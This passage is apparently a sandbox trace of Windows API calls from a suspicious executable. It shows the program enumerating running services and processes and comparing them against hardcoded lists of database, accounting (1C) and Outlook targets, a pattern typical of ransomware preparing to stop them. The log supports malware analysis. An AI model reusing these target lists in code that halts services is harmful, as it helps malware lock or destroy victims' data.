(lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0031.214] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0031.214] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0031.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0031.214] lstrlenW (lpString="CscService") returned 10 [0031.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0031.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0031.214] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0031.214] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0031.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0031.214] lstrlenW (lpString="DcomLaunch") returned 10 [0031.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0031.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0031.214] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0031.214] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0031.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0031.214] lstrlenW (lpString="Dhcp") returned 4 [0031.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0031.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0031.214] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0031.214] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0031.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0031.214] lstrlenW (lpString="Dnscache") returned 8 [0031.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0031.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0031.214] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0031.214] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0031.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0031.214] lstrlenW (lpString="DPS") returned 3 [0031.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0031.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0031.214] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0031.214] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0031.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0031.214] lstrlenW (lpString="eventlog") returned 8 [0031.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0031.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0031.215] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0031.215] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0031.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0031.215] lstrlenW (lpString="EventSystem") returned 11 [0031.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0031.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0031.215] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0031.215] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0031.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0031.215] lstrlenW (lpString="gpsvc") returned 5 [0031.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0031.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0031.215] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0031.215] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0031.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0031.215] lstrlenW (lpString="iphlpsvc") returned 8 [0031.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0031.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0031.215] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0031.215] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0031.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0031.215] lstrlenW (lpString="LanmanServer") returned 12 [0031.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0031.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0031.215] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0031.215] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0031.215] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0031.215] lstrlenW (lpString="LanmanWorkstation") returned 17 [0031.215] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0031.215] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0031.216] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0031.216] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0031.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0031.216] lstrlenW (lpString="lmhosts") returned 7 [0031.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0031.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0031.216] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0031.216] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0031.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0031.216] lstrlenW (lpString="MMCSS") returned 5 [0031.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0031.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0031.216] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0031.216] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0031.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0031.216] lstrlenW (lpString="MpsSvc") returned 6 [0031.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0031.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0031.216] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0031.216] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0031.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0031.216] lstrlenW (lpString="Netman") returned 6 [0031.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0031.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0031.216] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0031.216] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0031.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0031.216] lstrlenW (lpString="netprofm") returned 8 [0031.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0031.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0031.216] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0031.216] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0031.216] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0031.216] lstrlenW (lpString="NlaSvc") returned 6 [0031.216] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0031.216] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0031.216] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0031.217] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0031.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0031.217] lstrlenW (lpString="nsi") returned 3 [0031.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0031.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0031.217] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0031.217] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0031.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0031.217] lstrlenW (lpString="PcaSvc") returned 6 [0031.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0031.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0031.217] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0031.217] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0031.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0031.217] lstrlenW (lpString="PlugPlay") returned 8 [0031.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0031.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0031.217] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0031.217] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0031.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0031.217] lstrlenW (lpString="Power") returned 5 [0031.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0031.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0031.217] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0031.217] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0031.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0031.217] lstrlenW (lpString="ProfSvc") returned 7 [0031.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0031.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0031.217] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0031.217] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0031.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0031.217] lstrlenW (lpString="RpcEptMapper") returned 12 [0031.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0031.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0031.217] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0031.217] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0031.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0031.218] lstrlenW (lpString="RpcSs") returned 5 [0031.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0031.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0031.218] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0031.218] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0031.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0031.218] lstrlenW (lpString="SamSs") returned 5 [0031.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0031.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0031.218] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0031.218] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0031.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0031.218] lstrlenW (lpString="Schedule") returned 8 [0031.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0031.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0031.218] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0031.218] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0031.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0031.218] lstrlenW (lpString="SENS") returned 4 [0031.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0031.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0031.218] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0031.218] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0031.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0031.218] lstrlenW (lpString="ShellHWDetection") returned 16 [0031.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0031.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0031.218] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0031.218] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0031.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0031.218] lstrlenW (lpString="Spooler") returned 7 [0031.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0031.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0031.218] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0031.218] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0031.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0031.218] lstrlenW (lpString="SysMain") returned 7 [0031.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0031.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0031.219] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0031.219] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0031.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0031.219] lstrlenW (lpString="Themes") returned 6 [0031.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0031.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0031.219] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0031.219] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0031.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0031.219] lstrlenW (lpString="TrkWks") returned 6 [0031.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0031.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0031.219] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0031.219] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0031.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0031.219] lstrlenW (lpString="UxSms") returned 5 [0031.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0031.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0031.219] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0031.219] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0031.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0031.219] lstrlenW (lpString="WdiServiceHost") returned 14 [0031.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0031.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0031.219] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0031.219] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0031.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0031.219] lstrlenW (lpString="WdiSystemHost") returned 13 [0031.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0031.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0031.219] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0031.219] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0031.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0031.219] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0031.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0031.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0031.219] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0031.220] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0031.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0031.220] lstrlenW (lpString="Winmgmt") returned 7 [0031.220] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0031.220] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0031.220] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0031.220] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0031.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0031.220] lstrlenW (lpString="WPDBusEnum") returned 10 [0031.220] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0031.220] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0031.220] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0031.220] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0031.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0031.220] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6091e8 | out: hHeap=0x5d0000) returned 1 [0031.220] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0031.225] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0031.225] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0031.226] lstrlenW (lpString="System") returned 6 [0031.226] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0031.226] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0031.226] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0031.226] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0031.226] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0031.226] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0031.226] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0031.226] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0031.227] lstrlenW (lpString="smss.exe") returned 8 [0031.227] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0031.227] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0031.227] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0031.227] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0031.227] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0031.227] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0031.227] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0031.227] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0031.228] lstrlenW (lpString="csrss.exe") returned 9 [0031.228] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0031.228] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0031.228] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0031.228] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0031.228] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0031.228] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0031.228] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0031.228] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0031.228] lstrlenW (lpString="wininit.exe") returned 11 [0031.228] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0031.228] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0031.228] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0031.228] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0031.229] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0031.229] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0031.229] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0031.229] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0031.229] lstrlenW (lpString="csrss.exe") returned 9 [0031.229] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0031.229] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0031.229] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0031.229] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0031.229] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0031.229] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0031.229] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0031.230] lstrlenW (lpString="winlogon.exe") returned 12 [0031.230] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0031.231] lstrlenW (lpString="services.exe") returned 12 [0031.231] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0031.231] lstrlenW (lpString="lsass.exe") returned 9 [0031.231] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0031.232] lstrlenW (lpString="lsm.exe") returned 7 [0031.232] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.232] lstrlenW (lpString="svchost.exe") returned 11 [0031.232] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.233] lstrlenW (lpString="svchost.exe") returned 11 [0031.233] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.234] lstrlenW (lpString="svchost.exe") returned 11 [0031.234] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.234] lstrlenW (lpString="svchost.exe") returned 11 [0031.234] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.235] lstrlenW (lpString="svchost.exe") returned 11 [0031.235] Process32NextW 